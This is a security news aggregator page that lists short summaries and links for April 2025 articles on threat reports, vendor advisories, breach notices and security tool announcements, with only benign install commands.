Bytes Revealer is a powerful reverse engineering and binary analysis tool designed for security researchers, forensic analysts, and developers. With features like hex view, visual representation, string extraction, entropy calculation, and file signature detection, it helps users uncover hidden data inside files. Whether you are analyzing malware, debugging binaries, or investigating unknown file formats, Bytes Revealer makes it easy to explore, search, and extract valuable information from any binary file. Bytes Revealer do NOT store any file or data. All analysis is performed in your browser. Current Limitation: Files less than 50MB can perform all analysis, files bigger up to 1.5GB will only do Visual View and Hex View analysis. Features File Analysis Chunked file processing for...
http://www.kitploit.com/2025/04/bytesrevealer-online-reverse.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Interview with Safety Detectives
Happy Monday, friends! I hope you had a great weekend. I had an interesting interview with Safety Detectives about steps we can take to make things better for the next generation of cyber defenders. I encourage you to check out the article, here: https://www.safetydetectives.com/blog/lesley-carhart-dragos/
https://tisiphone.net/2025/04/21/interview-with-safety-detectives/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lumma Stealer – Tracking distribution channels
During incident response activities, our GERT team discovered Lumma Stealer in a customer's infrastructure. Our experts conducted an investigation and analyzed its distribution scheme in detail.
https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation
North Korean IT workers are reportedly using real-time deepfakes to secure remote work, raising serious security concerns. We explore the implications.
The post False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation appeared first on Unit 42.
https://unit42.paloaltonetworks.com/north-korean-synthetic-identity-creation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Phishing attacks leveraging HTML code inside SVG files
Attackers are increasingly sending phishing emails with SVG attachments that contain embedded HTML pages or JavaScript code.
https://securelist.com/svg-phishing/116256/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A week in security (April 12 – April 18)
A list of topics we covered in the week of April 12 to April 18 of 2025
https://www.malwarebytes.com/blog/news/2025/04/a-week-in-security-april-12-april-18
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Did DOGE “breach” Americans’ data? (Lock and Code S06E08)
This week on the Lock and Code podcast, we speak with Sydney Saubestre about DOGE and its access to Americans' data.
https://www.malwarebytes.com/blog/podcast/2025/04/did-doge-breach-americans-data-lock-and-code-s06e08
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
State-sponsored hackers embrace ClickFix social engineering tactic
https://www.proofpoint.com/us/newsroom/news/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin
AhnLab SEcurity intelligence Center (ASEC) recently identified cases of attacks installing Ammyy Admin on poorly managed MS-SQL servers. Ammyy Admin is a remote control tool used to control systems remotely along with AnyDesk, ToDesk, TeamViewer, etc. When these tools are used properly, they enable companies and individuals to manage and control systems remotely. However, […]
https://asec.ahnlab.com/en/87606/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CentralizedFirewall - Provides A Firewall Manager API Designed To Centralize And Streamline The Management Of Firewall Configurations
Firewall Manager API Project Installation Follow these steps to set up and run the API project: 1. Clone the Repository git clone https://github.com/adriyansyah-mf/CentralizedFirewallcd CentralizedFirewall 2. Edit the .env File Update the environment variables in .env according to your configuration. nano .env 3. Start the API with Docker Compose docker compose up -d This will start the API in detached mode. 4. Verify the API is Running Check if the containers are up: docker ps Additional Commands Stop the API docker compose down Restart the API docker compose restart Let me know if you need any modifications! 🚀 How to setup for the first time and connect to firewall client Install Firewall Agent on your node server Run the agent with the following command sudo dpkg -i firewall-client_deb.deb...
http://www.kitploit.com/2025/04/centralizedfirewall-provides-firewall.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Maryam - Open-source Intelligence(OSINT) Framework
OWASP Maryam is a modular open-source framework based on OSINT and data gathering. It is designed to provide a robust environment to harvest data from open sources and search engines quickly and thoroughly. Installation Supported OS Linux FreeBSD Darwin OSX $ pip install maryam Alternatively, you can install the latest version with the following command (Recommended): pip install git+https://github.com/saeeddhqan/maryam.git Usage # Using dns_search. --max means all of resources. --api shows the results as json.# .. -t means use multi-threading.maryam -e dns_search -d ibm.com -t 5 --max --api --form # Using youtube. -q means querymaryam -e youtube -q "<QUERY>"maryam -e google -q "<QUERY>"maryam -e dnsbrute -d domain.tld# Show framework modulesmaryam -e show modules#...
http://www.kitploit.com/2025/04/maryam-open-source-intelligenceosint.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
5 reasons to not miss Sonatype at RSAC 2025
RSA Conference (RSAC) brings together cybersecurity practitioners from across the globe to learn about the latest cybersecurity defense strategies and tools, connect with industry peers, and share knowledge about the threat landscape.
https://www.sonatype.com/blog/5-reasons-to-not-miss-sonatype-at-rsac-2025
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Metasploit Wrap-Up 04/18/2025
This week, a significant enhancement was made to the already awesome fetch payload feature by our very own bwatters-r7. Learn more!
https://blog.rapid7.com/2025/04/18/metasploit-wrap-up-04-18-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog
Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful secrets discovery, classification, validation, and analysis open source tool. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more. With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories. ⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms. You can use online version...
http://www.kitploit.com/2025/04/trufflehog-explorer-user-friendly-web.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
YouTube Marketing Lesson From RSA Conference 2025
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story from RSA Conference Sausalito, Calif. – Apr. 18, 2025 Cybersecurity Ventures recently asked AI “Why use YouTube for marketing?” and it replied “YouTube is a powerful marketing tool because of its
The post YouTube Marketing Lesson From RSA Conference 2025 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/youtube-marketing-lesson-from-rsa-conference-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
16-31 December 2024 Cyber Attacks Timeline
In the second timeline of December 2024, I collected 94 events with a threat landscape dominated by malware with...
https://www.hackmageddon.com/2025/04/18/16-31-december-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How Legit Is Using Classic Economic Tools to Prevent Application Vulnerabilities
Learn more about how Legit is helping enterprises prevent vulnerabilities in their SDLCs.
https://www.legitsecurity.com/blog/how-legit-is-using-classic-economic-models-to-prevent-application-vulnerabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What to Look for in Application Security Posture Management (ASPM)
Get details on the key capabilities for an ASPM platform.
https://www.legitsecurity.com/blog/what-to-look-for-in-application-security-posture-management-aspm
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mobile Security & Malware Issue 3st Week of April, 2025
ASEC Blog publishes “Mobile Security & Malware Issue 3st Week of April, 2025”
https://asec.ahnlab.com/en/87548/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Navigating the complexities of cloud security
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Technology Record Sausalito, Calif. – Apr. 17, 2025 The global threat landscape is projected to become more sophisticated, with cybercrime expected to cost the world .5 trillion annually by 2025, and
The post Navigating the complexities of cloud security appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/navigating-the-complexities-of-cloud-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Fixed An Old Chrome Flaw That Exposed Browsing History
Google Chrome receives a significant security update as the tech giant addresses a major security…
Google Fixed An Old Chrome Flaw That Exposed Browsing History on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/17/google-fixed-an-old-chrome-flaw-that-exposed-browsing-history/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft Defender For Endpoint Now Isolates Undiscovered Endpoints
With recent updates, Microsoft took another step towards thwarting network threats with Defender. As announced,…
Microsoft Defender For Endpoint Now Isolates Undiscovered Endpoints on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/17/microsoft-defender-for-endpoint-now-isolates-undiscovered-endpoints/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CapCut copycats are on the prowl
Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead
https://www.welivesecurity.com/en/scams/capcut-copycats-prowl/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
IronHusky updates the forgotten MysterySnail RAT to target Russia and Mongolia
MysterySnail RAT attributed to IronHusky APT group hasn't been reported since 2021. Recently, Kaspersky GReAT detected new versions of this implant in government organizations in Mongolia and Russia.
https://securelist.com/mysterysnail-new-version/116226/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
My New Paper on OT Ransomware!
Hello friends, I’m very excited to publish my first SANS Institute Whitepaper. I have developed a formal framework for preparing for OT / ICS ransomware attacks. I really hope you enjoy the paper and find it useful in building a strong defense against cyber-crime. You can download the white paper, A Simple Framework for OT […]
https://tisiphone.net/2025/04/16/my-new-paper-on-ot-ransomware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis
Agent Tesla, Remcos RAT and XLoader delivered via a complex phishing campaign. Learn how attackers are using multi-stage delivery to hinder analysis.
The post Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis appeared first on Unit 42.
https://unit42.paloaltonetworks.com/phishing-campaign-with-complex-attack-chain/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Windows Registry Adventure #6: Kernel-mode objects
Posted by Mateusz Jurczyk, Google Project Zero
Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data is sufficient for handling static files encoded in this format, such as when writing a custom regf parser to inspect hives extracted from a hard drive. However, for those interested in how regf files are managed by Windows at runtime, rather than just their behavior in isolation, there's a whole other...
https://googleprojectzero.blogspot.com/2025/04/the-windows-registry-adventure-6-kernel.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What's happening with MITRE and the CVE program uncertainty
Yesterday's headlines have sent ripples through the cybersecurity and software supply chain communities: MITRE announced that U.S. government funding for the CVE (Common Vulnerabilities and Exposures) database was set to expire today. Overnight, the CVE Foundation emerged with a plan to maintain the program before the Cybersecurity and Infrastructure Security Agency (CISA) announced it has extended support for the program this morning. As the backbone of the global vulnerability identification system, CVE has long served as the industry's shared language for describing digital flaws. For Sonatype customers, here's the good news: you're already covered. Our security research and vulnerability dataset were built for this exact kind of disruption — and go far beyond CVE. ...
https://www.sonatype.com/blog/cve-program-uncertainty
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransom & Dark Web Issues Week 3, April 2025
ASEC Blog publishes Ransom & Dark Web Issues Week 3, April 2025 Qilin Ransomware Attack on South Korean Corporations: Threat Analysis and Implications Renowned Cybercrime Forum BreachForums Experiences Access Errors and Goes Offlin U.S.-based Imageboard Site 4chan Experiences Service Disruption Due to Hacking Incident […]
https://asec.ahnlab.com/en/87536/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Streamlining detection engineering in security operation centers
A proper detection engineering program can help improve SOC operations. In this article we'll discuss potential SOC issues, the necessary components of a detection engineering program and some useful metrics for evaluating its efficiency.
https://securelist.com/streamlining-detection-engineering/116186/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
They're coming for your data: What are infostealers and how do I stay safe?
Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data
https://www.welivesecurity.com/en/malware/theyre-coming-data-infostealers-how-stay-safe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Funding Expires for Key Cyber Vulnerability Database
A critical resource that cybersecurity professionals worldwide rely on to identify, mitigate and fix security vulnerabilities in software and hardware is in danger of breaking down. The federally funded, non-profit research and development organization MITRE warned today that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program -- which is traditionally funded each year by the Department of Homeland Security -- expires on April 16.
https://krebsonsecurity.com/2025/04/funding-expires-for-key-cyber-vulnerability-database/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Measuring success in dataops, data governance, and data security
https://www.proofpoint.com/us/newsroom/news/measuring-success-dataops-data-governance-and-data-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Building Web Check using PaaS
How Platform as a Service (PaaS) can make good security easier to achieve.
https://www.ncsc.gov.uk/blog-post/building-web-check-using-paas
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
300 Milliseconds to Admin: Mastering DLL Hijacking and Hooking to Win the Race (CVE-2025-24076 and CVE-2025-24994)
As a pentester you are sometimes thrown into projects where you have no idea where you are going to end up. This project was one of those where you were given a customer laptop and the aim was to “find something interesting”, perhaps a misconfiguration on the customer side. The problem was that the laptop […]
https://blog.compass-security.com/2025/04/3-milliseconds-to-admin-mastering-dll-hijacking-and-hooking-to-win-the-race-cve-2025-24076-and-cve-2025-24994/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Trump Revenge Tour Targets Cyber Leaders, Elections
President Trump last week revoked security clearances for Chris Krebs, the former director of the Cybersecurity and Infrastructure Security Agency (CISA) who was fired by Trump after declaring the 2020 election the most secure in U.S. history. The White House memo, which also suspended clearances for other security professionals at Krebs's employer SentinelOne, comes as CISA is facing huge funding and staffing cuts.
https://krebsonsecurity.com/2025/04/trump-revenge-tour-targets-cyber-leaders-elections/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cases Studies and Countermeasures of Credential Stuffing Attacks Using Leaked Accounts
Abstract Credential stuffing attacks using leaked passwords have been rapidly increasing. These attacks that began with a simple technique has evolved—through advances in automation tools and the vulnerability of credential reuse—into large-scale account breaches and financial damages. Previously, the threats could be identified simply by detecting the large number of login attempts. However, attackers today […]
https://asec.ahnlab.com/en/87535/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Case of Injection Attack Using Legitimate MS Utility mavinject.exe
1. Overview Mavinject.exe is a legitimate utility provided by Microsoft. It is used to inject DLLs into specific processes in an Application Virtualization (App-V) environment. It has been included in the operating system by default since Windows 10 version 1607, and it is a trusted executable file signed by Microsoft. As a result, most security […]
https://asec.ahnlab.com/en/87559/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
April Patch Tuesday From Microsoft Fixed Over 130 Vulnerabilities
Microsoft rolled out the monthly security updates for April, fixing over a hundred different vulnerabilities.…
April Patch Tuesday From Microsoft Fixed Over 130 Vulnerabilities on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/14/april-patch-tuesday-from-microsoft-fixed-over-130-vulnerabilities/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware
North Korean state-sponsored group Slow Pisces (Jade Sleet) targeted crypto developers with a social engineering campaign that included malicious coding challenges.
The post Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Attacks on the education sector are surging: How can cyber-defenders respond?
Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?
https://www.welivesecurity.com/en/business-security/attacks-education-sector-surging-cyber-defenders-respond/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
APT Group Profiles – Larva-24005
1) Introduction During the breach investigation process, the AhnLab SEcurity intelligence Center (ASEC) discovered a new operation related to the Kimsuky group and named it Larva-24005.1 The threat actors exploited the RDP vulnerability to infiltrate the system. They then changed the system configuration by installing the MySpy malware and RDPWrap to create […]
https://asec.ahnlab.com/en/87554/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Samsung Germany Customer Tickets - 216,333 breached accounts
In March 2025, data from Samsung Germany was compromised in a data breach of their logistics provider, Spectos. Allegedly due to credentials being obtained by malware running on a Spectos employee's machine, the breach included 216k unique email addresses along with names, physical addresses, items purchased from Samsung Germany and related support tickets and shipping tracking numbers.
https://haveibeenpwned.com/PwnedWebsites#SamsungGermany
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hands-On Labs: The Key to Accelerating CMMC 2.0 Compliance
Cary, North Carolina, 11th April 2025, CyberNewsWire
Hands-On Labs: The Key to Accelerating CMMC 2.0 Compliance on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/11/hands-on-labs-the-key-to-accelerating-cmmc-2-0-compliance/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows CLFS Driver Elevation of Privilege
What is the Vulnerability?A zero-day vulnerability has recently been identified in the Common Log File System (CLFS) kernel driver. CLFS is a general-purpose logging subsystem within the Windows operating system that provides a high-performance way to store log data for various applications. If successfully exploited, an attacker operating under a standard user account can elevate their privileges.Furthermore, Microsoft has observed that the exploit has been utilized by PipeMagic malware and has attributed this exploitation activity to Storm-2460, which has also leveraged PipeMagic to distribute ransomware. Microsoft has published a blog that provides an in-depth analysis of Microsoft's findings regarding the CLFS exploit and the associated activities. Exploitation of CLFS zero-day leads to...
https://fortiguard.fortinet.com/threat-signal-report/6073
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How we're making security easier for the average developer
Security should be native to your workflow, not a painful separate process.
The post How we're making security easier for the average developer appeared first on The GitHub Blog.
https://github.blog/security/application-security/how-were-making-security-easier-for-the-average-developer/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
China-based SMS Phishing Triad Pivots to Banks
China-based purveyors of SMS phishing kits are enjoying remarkable success converting phished payment card data into mobile wallets from Apple and Google. Until recently, the so-called “Smishing Triad” mainly impersonated toll road operators and shipping companies. But experts say these groups are now directly targeting customers of international financial institutions, while dramatically expanding their cybercrime infrastructure and support staff.
https://krebsonsecurity.com/2025/04/china-based-sms-phishing-triad-pivots-to-banks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
March 2025 Deep Web and Dark Web Trends Report
Note This trend report on the deep web and dark web of March 2025 is sectioned into Ransomware, Data Breach, DarkWeb, CyberAttack, and Threat Actor. Please note that there are some parts of the content that cannot be verified for accuracy. Key Issues 1) Ransomware 1. Overview […]
https://asec.ahnlab.com/en/87553/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
GOFFEE continues to attack organizations in Russia
Kaspersky researchers analyze GOFFEE's campaign in H2 2024: the updated infection scheme, new PowerModul implant, switch to a binary Mythic agent.
https://securelist.com/goffee-apt-new-attacks/116139/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Watch out for these traps lurking in search results
Here's how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results
https://www.welivesecurity.com/en/cybersecurity/watch-out-traps-lurking-search-results/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to request a change to a CVE record
Learn how to identify which CVE Numbering Authority is responsible for the record, how to contact them, and what to include with your suggestion.
The post How to request a change to a CVE record appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/how-to-request-a-change-to-a-cve-record/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Legit Scans for Secrets in SharePoint
Get details on Legit's new ability to scan for secrets in SharePoint.
https://www.legitsecurity.com/blog/legit-scans-for-secrets-in-sharepoint
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Qraved - 984,519 breached accounts
In July 2021, the Indonesian restaurant website Qraved suffered a data breach that was later redistributed as part of a larger corpus of data. The breach exposed almost 1M unique email addresses along with names, phone numbers, dates of birth and passwords stored as MD5 hashes.
https://haveibeenpwned.com/PwnedWebsites#Qraved
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How Prompt Attacks Exploit GenAI and How to Fight Back
GenAI boosts productivity but also poses security risks. Palo Alto Networks has a new whitepaper about prompt-based threats and how to defend against them.
The post How Prompt Attacks Exploit GenAI and How to Fight Back appeared first on Unit 42.
https://unit42.paloaltonetworks.com/new-frontier-of-genai-threats-a-comprehensive-guide-to-prompt-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
So your friend has been hacked: Could you be next?
When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.
https://www.welivesecurity.com/en/cybersecurity/so-your-friend-has-been-hacked-could-you-be-next/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A WinRAR Flaw Could Allow MotW Security Bypass
Heads up, WinRAR users! A recently patched security flaw in WinRAR could allow mark-of-the-web (MotW)…
A WinRAR Flaw Could Allow MotW Security Bypass on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/09/a-winrar-flaw-could-allow-motw-security-bypass/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Patch Tuesday, April 2025 Edition
Microsoft today released updates to plug at least 121 security holes in its Windows operating systems and software, including one vulnerability that is already being exploited in the wild. Eleven of those flaws earned Microsoft's most-dire "critical" rating, meaning malware or malcontents could exploit them with little to no interaction from Windows users.
https://krebsonsecurity.com/2025/04/patch-tuesday-april-2025-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Boulanger - 2,077,078 breached accounts
In September 2024, French electronics retailer Boulanger suffered a data breach that exposed over 27M rows of data. The data included 2M unique email addresses along with names, physical addresses, phone numbers and latitude and longitude. The data was later publicly published to a popular hacking forum. The data was provided to HIBP by a source who requested it be attributed to "leidhall".
https://haveibeenpwned.com/PwnedWebsites#Boulanger
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Found means fixed: Reduce security debt at scale with GitHub security campaigns
Starting today, security campaigns are generally available for all GitHub Advanced Security and GitHub Code Security customers—helping organizations take control of their security debt and manage risk by unlocking collaboration between developers and security teams.
The post Found means fixed: Reduce security debt at scale with GitHub security campaigns appeared first on The GitHub Blog.
https://github.blog/security/application-security/found-means-fixed-reduce-security-debt-at-scale-with-github-security-campaigns/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Campaign Targets Amazon EC2 Instance Metadata via SSRF
Discover the latest CVE trends and a new campaign targeting websites hosted in EC2 instances on AWS.
https://www.f5.com/labs/articles/threat-intelligence/campaign-targets-amazon-ec2-instance-metadata-via-ssrf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Attackers distributing a miner and the ClipBanker Trojan via SourceForge
Malicious actors are using SourceForge to distribute a miner and the ClipBanker Trojan while utilizing unconventional persistence techniques.
https://securelist.com/miner-clipbanker-sourceforge-campaign/116088/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1 billion reasons to protect your identity online
Corporate data breaches are a gateway to identity fraud, but they're not the only one. Here's a lowdown on how your personal data could be stolen – and how to make sure it isn't.
https://www.welivesecurity.com/en/cybersecurity/1-billion-reasons-protect-identity-online/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
No certificate name verification for fgfm connection
A improper restriction of communication channel to intended endpoints vulnerability [CWE-923] in FortiOS, FortiProxy, FortiManager, FortiAnalyzer, FortiVoice and FortiWeb may allow an unauthenticated attacker in a man-in-the-middle position to impersonate the management device (FortiCloud server or/and in certain conditions, FortiManager), via intercepting the FGFM authentication request between the management device and the managed device Revised on 2025-04-22 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-046
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Directory Traversal
An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability [CWE-22] in FortiWeb endpoint may allow an authenticated admin to access and modify the filesystem via crafted requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-474
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
EMS can send javascript code to client through messages
An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in FortiClient may allow the EMS administrator to send messages containing javascript code. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-344
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Incorrect user management in widgets dashboard
An Incorrect User Management vulnerability [CWE-286] in FortiWeb widgets dashboard may allow an authenticated attacker with at least read-only admin permission to perform operations on the dashboard of other administrators via crafted requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-184
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
LDAP Clear-text credentials retrievable with IP modification
An insufficiently protected credentials [CWE-522] vulnerability in FortiOS may allow a privileged authenticated attacker to retrieve LDAP credentials via modifying the LDAP server IP address in the FortiOS configuration to point to a malicious attacker-controlled server. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-111
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Log Pollution via login page
An Improper Output Neutralization for Logs vulnerability [CWE-117] in FortiManager and FortiAnalyzer may allow an unauthenticated remote attacker to pollute the logs via crafted login requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-453
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
OS command injection on diagnose feature (GUI)
An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in FortiIsolator may allow a privileged attacker with super-admin profile and CLI access to execute unauthorized code via specifically crafted HTTP requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-397
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
OS command injection on gen-ca-cert command
An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in FortiIsolator CLI may allow a privileged attacker to execute unauthorized code or commands via crafted CLI requests. Revised on 2025-04-08 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-392
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint Simplifies Security Solutions Sales For Partners Through Ingram Micro Xvantage Platform
https://www.proofpoint.com/us/newsroom/news/proofpoint-simplifies-security-solutions-sales-partners-through-ingram-micro-xvantage
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Legit and Traceable: Better Together
Get details on Legit's new partnership with Traceable.
https://www.legitsecurity.com/blog/legit-and-traceable-better-together
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SpyCloud Research Shows that Endpoint Detection and Antivirus Solutions Miss Two-Thirds (66%) of Malware Infections
Austin, TX, USA, 7th April 2025, CyberNewsWire
SpyCloud Research Shows that Endpoint Detection and Antivirus Solutions Miss Two-Thirds (66%) of Malware Infections on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/07/spycloud-research-shows-that-endpoint-detection-and-antivirus-solutions-miss-two-thirds-66-of-malware-infections/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Key Cybersecurity Challenges In 2025—Trends And Observations
https://www.proofpoint.com/us/newsroom/news/key-cybersecurity-challenges-2025-trends-and-observations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Kubernetes Ingress-nginx Controller RCE
What is the Vulnerability?On March 24, researchers disclosed a set of five vulnerabilities, collectively known as "IngressNightmare,” affecting Ingress-nginx, one of the popular ingress controllers available for Kubernetes. Using Ingress-NGINX is one of the most common methods for exposing Kubernetes applications externally.CVE-2025-1974 is considered the most serious of the five and has been assigned a CVSS score of 9.8 (critical). When chained with one of the lower severity vulnerabilities, it allows for unauthenticated remote code execution. This exploitation could result in the exposure of sensitive information that the controller can access. Consequently, unauthenticated attackers have the potential to compromise the system by executing unauthorized code.What is the recommended Mitigation?Kubernetes...
https://fortiguard.fortinet.com/threat-signal-report/6061
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google announces Sec-Gemini v1, a new experimental cybersecurity model
Posted by Elie Burzstein and Marianna Tishchenko, Sec-Gemini teamToday, we're announcing Sec-Gemini v1, a new experimental AI model focused on advancing cybersecurity AI frontiers. As outlined a year ago, defenders face the daunting task of securing against all cyber threats, while attackers need to successfully find and exploit only a single vulnerability. This fundamental asymmetry has made securing systems extremely difficult, time consuming and error prone. AI-powered cybersecurity workflows have the potential to help shift the balance back to the defenders by force multiplying cybersecurity professionals like never before. Effectively powering SecOps workflows requires state-of-the-art reasoning capabilities and extensive current cybersecurity knowledge. Sec-Gemini v1 achieves...
http://security.googleblog.com/2025/04/google-launches-sec-gemini-v1-new.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Taming the Wild West of ML: Practical Model Signing with Sigstore
Posted by Mihai Maruseac, Google Open Source Security Team (GOSST)In partnership with NVIDIA and HiddenLayer, as part of the Open Source Security Foundation, we are now launching the first stable version of our model signing library. Using digital signatures like those from Sigstore, we allow users to verify that the model used by the application is exactly the model that was created by the developers. In this blog post we will illustrate why this release is important from Google's point of view.With the advent of LLMs, the ML field has entered an era of rapid evolution. We have seen remarkable progress leading to weekly launches of various applications which incorporate ML models to perform tasks ranging from customer support, software development, and even performing security critical...
http://security.googleblog.com/2025/04/taming-wild-west-of-ml-practical-model.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe
A Minnesota cybersecurity and computer forensics expert whose testimony has featured in thousands of courtroom trials over the past 30 years is facing questions about his credentials and an inquiry from the Federal Bureau of Investigation (FBI). Legal experts say the inquiry could be grounds to reopen a number of adjudicated cases in which the expert's testimony may have been pivotal.
